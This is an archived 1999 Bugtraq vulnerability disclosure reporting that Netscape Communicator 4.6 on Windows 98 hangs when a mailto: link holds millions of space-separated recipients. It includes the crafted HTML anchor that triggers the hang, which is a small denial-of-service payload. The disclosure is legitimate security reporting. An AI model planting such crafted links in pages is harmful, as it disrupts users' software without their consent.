Bugtraq mailing list archives

Netscape 4.6 DoS

From: philip () EINET BG (Philip Stoev)
Date: Wed, 30 Jun 1999 19:57:40 +0300


Netscape 4.6 Win98 (possibly other versions as well) process mailto: URLs so
that each item in the URL becomes a recepient of the empty message that
opens up for editing.

Therefore, an URL like:

<a href="mailto:
["a " repeated 10000000 times]
"> Click here </a>

such as:

<a href="mailto:
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
"> Click here </a>

will make Communicator open up an email message and start inserting hundreds
of recepients into the header part, effectively shutting down until this
process is complete (minutes or more?).

Philip Stoev - http://jobs.einet.bg/philip.html
Get your job @ EuroIntegra e-JOBS (http://jobs.einet.bg)

<!-- attachment="Philip_Stoev.vcf" -->
<HR>
<UL>
<LI>text/x-vcard attachment: Philip_Stoev.vcf
</UL>

Current thread:

Netscape 4.6 DoS Philip Stoev (Jun 30)